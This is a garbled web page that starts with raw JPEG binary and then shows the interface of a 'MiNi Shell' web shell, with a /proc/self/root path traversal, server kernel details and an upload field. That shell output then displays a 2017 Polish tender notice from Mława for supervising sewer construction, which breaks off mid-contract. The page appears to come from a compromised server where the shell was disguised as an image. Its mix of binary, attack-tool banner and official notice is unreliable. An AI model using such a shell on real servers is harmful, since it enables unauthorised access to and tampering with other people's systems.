JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20170215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20170215/25586-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.mlawa.pl/zamowienia-publiczne-2/pelnienie-nadzoru-inwestorskiego-nad-budowa-kanalizacji-sanitarnej-na-terenie-aglomeracji-mlawa.html' target='_blank'>http://www.mlawa.pl/zamowienia-publiczne-2/pelnienie-nadzoru-inwestorskiego-nad-budowa-kanalizacji-sanitarnej-na-terenie-aglomeracji-mlawa.html</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 25586 - 2017
              z dnia 2017-02-15 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Mława: Pełnienie nadzoru inwestorskiego nad budową kanalizacji sanitarnej na terenie Aglomeracji Mława<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Postępowanie jest realizowane w ramach umowy o dofinansowanie  nr POIS.02.03.00-00-0034/16-00 Projektu Budowa kanalizacji sanitarnej na terenie Aglomeracji Mława nr POIS.02.03.00-00-0034/16 w ramach działania 2.3 Gospodarka wodno  ściekowa w aglomeracjach  II oś priorytetowa Ochrona środowiska, w tym adaptacja do zmian klimatu Programu Operacyjnego Infrastruktura i Środowisko 2014-2020.</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Burmistrz Miasta Mława, krajowy numer identyfikacyjny
              52482600000, ul.
              Stary Rynek 
              19,
              06-500  
              Mława, woj.
              mazowieckie, państwo
              Polska, tel.
              23 654 33 82, e-mail
              piotr.tomaszewski@mlawa.pl, faks
              236 543 652.
              <br />
              Adres strony internetowej (URL): www.mlawa.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://www.mlawa.pl/zamowienia-publiczne-2/pelnienie-nadzoru-inwestorskiego-nad-budowa-kanalizacji-sanitarnej-na-terenie-aglomeracji-mlawa.html</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.mlawa.pl/zamowienia-publiczne-2/pelnienie-nadzoru-inwestorskiego-nad-budowa-kanalizacji-sanitarnej-na-terenie-aglomeracji-mlawa.html</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Urząd Miasta Mława, ul. Stary Rynek 19, 06-500 Mława</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Pełnienie nadzoru inwestorskiego nad budową kanalizacji sanitarnej na terenie Aglomeracji Mława<br /><b>Numer referencyjny: </b>JRP.271.9.2017.PT<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest pełnienie nadzoru inwestorskiego nad budową kanalizacji sanitarnej na terenie Aglomeracji Mława w 8 określonych obszarach.
Szczegóły dotyczące zakresu pełnionej usługi oraz standardy jakościowe zawarte są we wzorze umowy.

Zakres robót nad którym pełnić należy nadzór określony jest w  dokumentacji projektowo  kosztorysowej oraz Specyfikacjach Technicznych Wykonania i Odbioru Robót będących załącznikami do SIWZ.

Zamawiający, zgodnie z art. 24aa ustawy Pzp, stosuje procedurę odwróconą tj. najpierw dokona oceny ofert a następnie zbada, czy Wykonawca, którego oferta została oceniona jako najkorzystniejsza, nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.

Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez wykonawcę 
lub podwykonawcę osób wykonujących czynności w trakcie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.  Kodeks pracy. Zamawiający określa szczegóły wymagań we wzorze umowy.
<br /><br /><b>II.5) Główny kod CPV: </b>71520000-9<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                - wykonali, a w przypadku świadczeń okresowych lub ciągłych wykonują, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, usługę nadzoru inwestorskiego nad budową sieci kanalizacji sanitarnej o długości nie mniejszej niż 500 mb w ramach jednej realizacji,
- dysponują 2 osobami z uprawnieniami budowlanymi w branży sanitarnej, 1 osobą z uprawnieniami budowlanymi w branży elektrycznej oraz 1 osobą z uprawnieniami archeologicznymi
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />- Wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
- Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości: 5 000,00 zł (słownie: pięć tysięcy złotych).
2.Wadium może być wniesione w następujących formach:
- pieniądzu, na rachunek bankowy nr 74 1090 2604 0000 0001 3379 7851,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych, 	
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
3.Wadium wnoszone w formie: poręczenia lub gwarancji należy dołączyć do oferty w oryginale.
4.Wadium musi być wniesione najpóźniej do dnia i godziny wyznaczonej na składanie ofert. W przypadku wniesienia wadium w formie pieniężnej za wniesienie rozumie się, że środki będą znajdować się na  koncie zamawiającego.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Ilość wizyt kontrolnych na budowach</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px">W dniu ........................................ r. pomiędzy:
Miastem Mława, z siedzibą w Mławie (06-500) przy ul. Stary Rynek 19, zwanym dalej Zamawiającym (NIP 569-17-60-034), reprezentowanym przez: 
1. ......................................................................................................................
2. ......................................................................................................................
a 
.....................................................................................................................................................
zwanym dalej w treści umowy  "Wykonawcą" z siedzibą:  
...............................................................................................................................................
reprezentowanym przez: 
1. ..............................................................................................................................

została zawarta umowa na Pełnienie nadzoru inwestorskiego nad budową kanalizacji sanitarnej na terenie Aglomeracji Mława
                             
§ 1
1.	Zamawiający na podstawie przeprowadzonego postępowania powierza, a Inspektor Nadzoru przyjmuje do realizacji zadanie pod nazwą: Pełnienie nadzoru inwestorskiego nad budową kanalizacji sanitarnej na terenie Aglomeracji Mława. 
2.	Postępowanie jest realizowane w ramach umowy o dofinansowanie
